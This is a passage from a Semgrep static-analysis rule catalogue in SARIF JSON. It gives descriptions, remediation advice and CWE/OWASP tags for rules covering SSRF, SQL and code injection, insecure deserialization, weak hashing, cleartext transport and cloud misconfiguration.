to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","id":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","name":"java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","HIGH CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.ssrf.httpclient-taint-concat.httpclient-taint-concat"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"help":{"markdown":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve)\n - [https://owasp.org/Top10/A01_2021-Broken_Access_Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control)\n - [https://owasp.org/www-community/attacks/Path_Traversal](https://owasp.org/www-community/attacks/Path_Traversal)\n - [https://portswigger.net/web-security/file-path-traversal](https://portswigger.net/web-security/file-path-traversal)\n","text":"The application builds a file path from potentially untrusted data, which can lead to a path traversal vulnerability. An attacker can manipulate the path which the application uses to access files. If the application does not validate user input and sanitize file paths, sensitive files such as configuration or user data can be accessed, potentially creating or overwriting files. To prevent this vulnerability, validate and sanitize any input that is used to create references to file paths. Also, enforce strict file access controls. For example, choose privileges allowing public-facing applications to access only the required files."},"helpUri":"https://semgrep.dev/r/python.lang.file.tainted-shelve.tainted-shelve","id":"python.lang.file.tainted-shelve.tainted-shelve","name":"python.lang.file.tainted-shelve.tainted-shelve","properties":{"precision":"very-high","tags":["CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","HIGH CONFIDENCE","OWASP-A01:2021 - Broken Access Control","OWASP-A05:2017 - Broken Access Control","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.file.tainted-shelve.tainted-shelve"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"help":{"markdown":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2)\n - [https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements](https://mobile-security.gitbook.io/masvs/security-requirements/0x08-v3-cryptography_verification_requirements)\n","text":"The use of the MD2 hashing algorithm was identified which is considered insecure. MD2 is not collision resistant and is therefore not suitable for cryptographic or secure use-cases. Use stronger algorithms such as SHA256, SHA512, or adaptive hashing algorithms such as argon2 or bcrypt."},"helpUri":"https://semgrep.dev/r/swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","id":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","name":"swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2","properties":{"precision":"very-high","tags":["CWE-327: Use of a Broken or Risky Cryptographic Algorithm","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: swift.commoncrypto.insecure-hashing-algorithm-md2.insecure-hashing-algorithm-md2"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"help":{"markdown":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship)\n - [https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text](https://docs.sqlalchemy.org/en/20/core/sqlelement.html#sqlalchemy.sql.expression.text)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"The application might dynamically evaluate untrusted input, which can lead to a code injection vulnerability. An attacker can execute arbitrary code, potentially gaining complete control of the system. Don't pass untrusted data to this relationship argument, it's getting passed to `eval`."},"helpUri":"https://semgrep.dev/r/python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","id":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","name":"python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.django.db.sqlalchemy-django-relationship.sqlalchemy-django-relationship"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"help":{"markdown":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request)\n - [https://openjdk.java.net/groups/net/httpclient/intro.html](https://openjdk.java.net/groups/net/httpclient/intro.html)\n","text":"Checks for requests sent via HttpClient to http:// URLS. This is dangerous because the server is attempting to connect to a website that does not encrypt traffic with TLS. Instead, send requests only to https:// URLS."},"helpUri":"https://semgrep.dev/r/problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","id":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","name":"problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: problem-based-packs.insecure-transport.java-stdlib.httpclient-http-request.httpclient-http-request"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a SQL injection vulnerability. An attacker can execute malicious SQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. To prevent this vulnerability, use prepared statements that do not concatenate user-controllable strings and use parameterized queries where SQL commands and user data are strictly separated. Also, consider using an object-relational (ORM) framework to operate with safer abstractions."},"helpUri":"https://semgrep.dev/r/python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","id":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","name":"python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.db.sqlalchemy-connection-flask.sqlalchemy-connection-flask"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"help":{"markdown":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen)\n - [https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator](https://wiki.sei.cmu.edu/confluence/display/c/STR31-C.+Guarantee+that+storage+for+strings+has+sufficient+space+for+character+data+and+the+null+terminator)\n","text":"`strlen(...)` returns the number of characters in a string, excluding the NUL terminator. If a string is later copied into this allocated buffer, it will trigger memory corruption."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.strings.alloc-strlen.alloc-strlen","id":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","name":"cpp.lang.security.strings.alloc-strlen.alloc-strlen","properties":{"precision":"very-high","tags":["CWE-131: Incorrect Calculation of Buffer Size","MEDIUM CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.strings.alloc-strlen.alloc-strlen"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"help":{"markdown":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"XPath queries are constructed dynamically on user-controlled input. This could lead to XPath injection if variables passed into the evaluate or compile commands are not properly sanitized. Xpath injection could lead to unauthorized access to sensitive information in XML documents. Thoroughly sanitize user input or use parameterized XPath queries if you can."},"helpUri":"https://semgrep.dev/r/java.micronaut.xpath.tainted-xpath.tainted-xpath","id":"java.micronaut.xpath.tainted-xpath.tainted-xpath","name":"java.micronaut.xpath.tainted-xpath.tainted-xpath","properties":{"precision":"very-high","tags":["CWE-643: Improper Neutralization of Data within XPath Expressions ('XPath Injection')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: java.micronaut.xpath.tainted-xpath.tainted-xpath"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"help":{"markdown":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization)\n - [https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8](https://docs.microsoft.com/en-us/dotnet/api/system.web.ui.losformatter?view=netframework-4.8)\n","text":"The LosFormatter type is dangerous and is not recommended for data processing. Applications should stop using LosFormatter as soon as possible, even if they believe the data they're processing to be trustworthy. LosFormatter is insecure and can't be made secure"},"helpUri":"https://semgrep.dev/r/csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","id":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","name":"csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","MEDIUM CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: csharp.lang.security.insecure-deserialization.los-formatter.insecure-losformatter-deserialization"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi)\n - [https://davidhamann.de/2020/04/05/exploiting-python-pickle/](https://davidhamann.de/2020/04/05/exploiting-python-pickle/)\n - [https://docs.python.org/3/library/pickle.html](https://docs.python.org/3/library/pickle.html)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html](https://pandas.pydata.org/docs/reference/api/pandas.read_hdf.html)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n - [https://redfoxsec.com/blog/insecure-deserialization-in-python/](https://redfoxsec.com/blog/insecure-deserialization-in-python/)\n - [https://www.exploit-db.com/exploits/49585](https://www.exploit-db.com/exploits/49585)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. The `pandas.read_hdf()` function uses `pickle` when the `fixed` format is used during serializing. This function should not be used with untrusted data."},"helpUri":"https://semgrep.dev/r/python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","id":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","name":"python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.fastapi.deserialization.tainted-pandas-hdf-fastapi.tainted-pandas-hdf-fastapi"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"help":{"markdown":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli)\n - [https://www.npmjs.com/package/mysql2](https://www.npmjs.com/package/mysql2)\n - [https://www.npmjs.com/package/mysql](https://www.npmjs.com/package/mysql)\n - [https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html)\n","text":"Detected a `$IMPORT` SQL statement that comes from a function argument. This could lead to SQL injection if the variable is user-controlled and is not properly sanitized. In order to prevent SQL injection, it is recommended to use parameterized queries or prepared statements."},"helpUri":"https://semgrep.dev/r/javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","id":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","name":"javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.lang.security.audit.sqli.node-mysql-sqli.node-mysql-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Unencrypted request over HTTP detected."},"help":{"markdown":"Unencrypted request over HTTP detected.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request)\n - [https://www.npmjs.com/package/axios](https://www.npmjs.com/package/axios)\n","text":"Unencrypted request over HTTP detected."},"helpUri":"https://semgrep.dev/r/typescript.react.security.react-insecure-request.react-insecure-request","id":"typescript.react.security.react-insecure-request.react-insecure-request","name":"typescript.react.security.react-insecure-request.react-insecure-request","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: typescript.react.security.react-insecure-request.react-insecure-request"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"help":{"markdown":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Detected non-static command inside 'open'. Audit the input to 'open'. If unverified user data can reach this call site, this is a code injection vulnerability. A malicious actor can inject a malicious script to execute arbitrary code."},"helpUri":"https://semgrep.dev/r/ruby.lang.security.dangerous-open.dangerous-open","id":"ruby.lang.security.dangerous-open.dangerous-open","name":"ruby.lang.security.dangerous-open.dangerous-open","properties":{"precision":"very-high","tags":["CWE-94: Improper Control of Generation of Code ('Code Injection')","LOW CONFIDENCE","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: ruby.lang.security.dangerous-open.dangerous-open"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"help":{"markdown":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin)\n - [https://cwe.mitre.org/data/definitions/732.html](https://cwe.mitre.org/data/definitions/732.html)\n","text":"Detected admin access granted in your policy. This means anyone with this policy can perform administrative actions. Instead, limit actions and resources to what you need according to least privilege."},"helpUri":"https://semgrep.dev/r/terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","id":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","name":"terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin","properties":{"precision":"very-high","tags":["CWE-732: Incorrect Permission Assignment for Critical Resource","MEDIUM CONFIDENCE","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: terraform.aws.security.aws-iam-admin-policy-ssoadmin.aws-iam-admin-policy-ssoadmin"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"help":{"markdown":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml)\n - [https://cwe.mitre.org/data/definitions/502.html](https://cwe.mitre.org/data/definitions/502.html)\n - [https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation](https://github.com/yaml/pyyaml/wiki/PyYAML-yaml.load(input)-Deprecation)\n - [https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html](https://knowledge-base.secureflag.com/vulnerabilities/unsafe_deserialization/unsafe_deserialization_python.html)\n - [https://nvd.nist.gov/vuln/detail/CVE-2017-18342](https://nvd.nist.gov/vuln/detail/CVE-2017-18342)\n - [https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures](https://owasp.org/Top10/A08_2021-Software_and_Data_Integrity_Failures)\n - [https://portswigger.net/web-security/deserialization](https://portswigger.net/web-security/deserialization)\n","text":"The application may convert user-controlled data into an object, which can lead to an insecure deserialization vulnerability. An attacker can create a malicious serialized object, pass it to the application, and take advantage of the deserialization process to perform Denial-of-service (DoS), Remote code execution (RCE), or bypass access control measures. PyYAML's `yaml` module is as powerful as `pickle` and so may call auny Python function. It is recommended to secure your application by using `yaml.SafeLoader` or `yaml.CSafeLoader`."},"helpUri":"https://semgrep.dev/r/python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","id":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","name":"python.lang.deserialization.tainted-pyyaml.tainted-pyyaml","properties":{"precision":"very-high","tags":["CWE-502: Deserialization of Untrusted Data","HIGH CONFIDENCE","OWASP-A08:2017 - Insecure Deserialization","OWASP-A08:2021 - Software and Data Integrity Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.deserialization.tainted-pyyaml.tainted-pyyaml"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"help":{"markdown":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM).\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html)\n","text":"A secret is hard-coded in the application. Secrets stored in source code, such as credentials, identifiers, and other types of sensitive data, can be leaked and used by internal or external malicious actors. Use environment variables to securely provide credentials and other secrets or retrieve them from a secure vault or Hardware Security Module (HSM)."},"helpUri":"https://semgrep.dev/r/python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","id":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","name":"python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret","properties":{"precision":"very-high","tags":["CWE-798: Use of Hard-coded Credentials","HIGH CONFIDENCE","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.urllib3.python-urllib3-hardcoded-secret.python-urllib3-hardcoded-secret"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"help":{"markdown":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"Insecure HostnameVerifier implementation detected. This will accept any SSL certificate with any hostname, which creates the possibility for man-in-the-middle attacks."},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","id":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","name":"java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","LOW CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.crypto.ssl.insecure-hostname-verifier.insecure-hostname-verifier"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"help":{"markdown":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\"\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls)\n - [https://node-postgres.com/features/ssl](https://node-postgres.com/features/ssl)\n - [https://nodejs.org/api/tls.html#tls_class_tls_tlssocket](https://nodejs.org/api/tls.html#tls_class_tls_tlssocket)\n - [https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options](https://nodejs.org/api/tls.html#tls_tls_createsecurecontext_options)\n - [https://nodejs.org/api/tls.html#tls_tls_default_min_version](https://nodejs.org/api/tls.html#tls_tls_default_min_version)\n","text":"If TLS is disabled on server side (Postgresql server), Sequelize establishes connection without TLS and no error will be thrown. To prevent MITN (Man In The Middle) attack, TLS must be enforce by Sequelize. Set \"ssl: true\" or define settings \"ssl: {...}\""},"helpUri":"https://semgrep.dev/r/javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","id":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","name":"javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls","properties":{"precision":"very-high","tags":["CWE-319: Cleartext Transmission of Sensitive Information","LOW CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","OWASP-A03:2017 - Sensitive Data Exposure","security"]},"shortDescription":{"text":"Semgrep Finding: javascript.sequelize.security.audit.sequelize-enforce-tls.sequelize-enforce-tls"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The AWS configuration aggregator does not aggregate all AWS Config region. This may result in unmonitored configuration in regions that are thought to be unused. Configure the aggregator with all_regions for the source."},"help":{"markdown":"The AWS configuration aggregator does not aggregate all AWS Config 